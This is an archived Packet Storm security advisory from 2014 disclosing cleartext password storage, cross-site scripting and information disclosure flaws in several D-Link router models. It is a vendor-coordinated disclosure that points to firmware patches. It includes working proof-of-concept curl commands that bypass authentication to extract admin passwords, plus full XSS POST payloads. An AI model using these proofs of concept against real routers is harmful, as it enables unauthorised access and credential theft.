Twenty Year Anniversary

D-Link Cross Site Scripting / Information Disclosure

D-Link Cross Site Scripting / Information Disclosure
Posted May 22, 2014
Authored by Kyle Lovett

D-Link DIR-652, DIR-835, DIR-855L, DGL-500, and DHP-1565 suffer from clear text storage of passwords, cross site scripting, and sensitive information disclosure vulnerabilities.

tags | exploit, vulnerability, xss, info disclosure
MD5 | b1d74ee568903473d380ad8b08d54f2d

D-Link Cross Site Scripting / Information Disclosure

Change Mirror Download
The following five D-Link model routers suffer from several
vulnerabilities including Clear Text Storage of Passwords, Cross Site
Scripting and Sensitive Information Disclosure.

DIR-652
D-Link Wireless N Gigabit Home Router

DIR-835
D-Link Network DIR-835L Wireless N 750M Dual-band 802.11n 4Port Gigabit Router

DIR-855L -
D-Link Wireless N900 Dual Band Gigabit Router

DGL-5500
D-Link AC1300 Gaming Router

DHP-1565
D-Link Wireless N PowerLine Gigabit Router

Affected firmware - FW 1.02b18/1.12b02 or older

Access - Remote
Complexity - Low
Authentication - None
Impact - Full loss of confidentiality

-------------------------------------------------------------------------------------------------------------
Clear Text Password - CWE - CWE-316: Cleartext Storage of Sensitive Information

Authentication can be bypassed to gain access to the file
tools_admin.asp, which stores the devices admin password in plain
text, by adding a "/" to the end of the URL.

Proof of Concept for the DGL-5500, DIR-855L and the DIR-835:

curl -s http://<IP>/tools_admin.asp/ |awk '/hidden/ &&
/admin_password_tmp/ && /value/ {print $5}'

PoC for the DHP-1565 and DIR-652, the generic 'user' must be added.

curl -s http://<IP>/tools_admin.asp/ -u user:|awk '/hidden/ &&
/admin_password_tmp/ && /value/ {print $5}'

-------------------------------------------------------------------------------------------------------------
Cross Site Scripting - CWE - CWE-79: Improper Neutralization of User
Input / Return

For the file "apply.cgi" ("apply_sec.cgi" on the DGL-5500) the POST
param "action" suffers from a XSS vulnerability due to improper
neutralization of user input / return output.

PoC for DIR-855L, DIR-835, DHP-1565

http://<IP>/apply.cgi

POST
graph_code=X&session_id=123456&login_n=user&login_name=8&action=%3Cbody%3E%3Chtml%3E%3Ch2%3E%3CEMBED%20src%3D%22%3Ctd%20dir%3D%22rtl%22class%3D%22skytext%22width%3D%2277%25%22%3E%3Cmarquee%20%20%20scrollAmount%3D5%20scrollDelay%3D10%20direction%3D%22right%22style%3D%22color%3Ared%3Bfont-weight%3Abold%3B%22%3ESquirrel%20Injection%22%3C%2fh2%3E%3C%2fmarquee%3E%20%3C%2fbody%3E%3C%2fhtml%3E%3C%2ftd%3E%3E&log_pass=&html_response_page=login_pic.asp&tmp_log_pass=&gcode_base64=MTg0MzU%3D
HTTP/1.1

For the DGL-5500

http://<IP>/apply_sec.cgi

POST
graph_code=X&session_id=123456&login_n=user&login_name=8&action=%3Cbody%3E%3Chtml%3E%3Ch2%3E%3CEMBED%20src%3D%22%3Ctd%20dir%3D%22rtl%22class%3D%22skytext%22width%3D%2277%25%22%3E%3Cmarquee%20%20%20scrollAmount%3D5%20scrollDelay%3D10%20direction%3D%22right%22style%3D%22color%3Ared%3Bfont-weight%3Abold%3B%22%3ESquirrel%20Injection%22%3C%2fh2%3E%3C%2fmarquee%3E%20%3C%2fbody%3E%3C%2fhtml%3E%3C%2ftd%3E%3E&log_pass=&html_response_page=login_pic.asp&tmp_log_pass=&gcode_base64=MTg0MzU%3D
HTTP/1.1

-------------------------------------------------------------------------------------------------------------
Sensitive Information Disclosure - CWE - CWE-200: Information Exposure

The D-Link models DGL-5500, DIR-855L, DIR-835 suffer from a
vulnerability which an unauthenticated person can gain access the
sensitive files:

http://<IP>:8080/hnap.cgi and /HNAP1/ via:

curl -s curl -s http://<IP>:8080/HNAP1/

On the DIR-652 and DHP-1565, a user needs authentication first to
gain access to these files.

But more importantly, an unauthenticated user can browse directly to
http://<IP>/cgi/ssi/ which will offer a download of the device's ELF
MBS MIPS file. The file contains most of the devices internal working
structure and sensitive information. These particular routers use a
MSB EM_MIPS Processor and it does contain executable components.

The file can be accessed through at least one known cgi file, however
there maybe others. Although no known publicly working example exist
to my knowledge, unpatched devices are susceptible to injection of
malicious code and most likely susceptible to a payload which could
deploy a self-replicating worm.
-------------------------------------------------------------------------------------------------------------

These items were reported to D-Link on April 20th, and to US Cert on
April 21. D-Link does have patches available for all affected models,
and it is highly recommended to update the device's firmware as soon
as possible.

Vendor Links:
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10025
http://securityadvisories.dlink.com/security/

Research Contact - Kyle Lovett
May 21, 2014

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

August 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    19 Files
  • 2
    Aug 2nd
    17 Files
  • 3
    Aug 3rd
    16 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    1 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    15 Files
  • 8
    Aug 8th
    9 Files
  • 9
    Aug 9th
    7 Files
  • 10
    Aug 10th
    10 Files
  • 11
    Aug 11th
    1 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    14 Files
  • 14
    Aug 14th
    18 Files
  • 15
    Aug 15th
    38 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close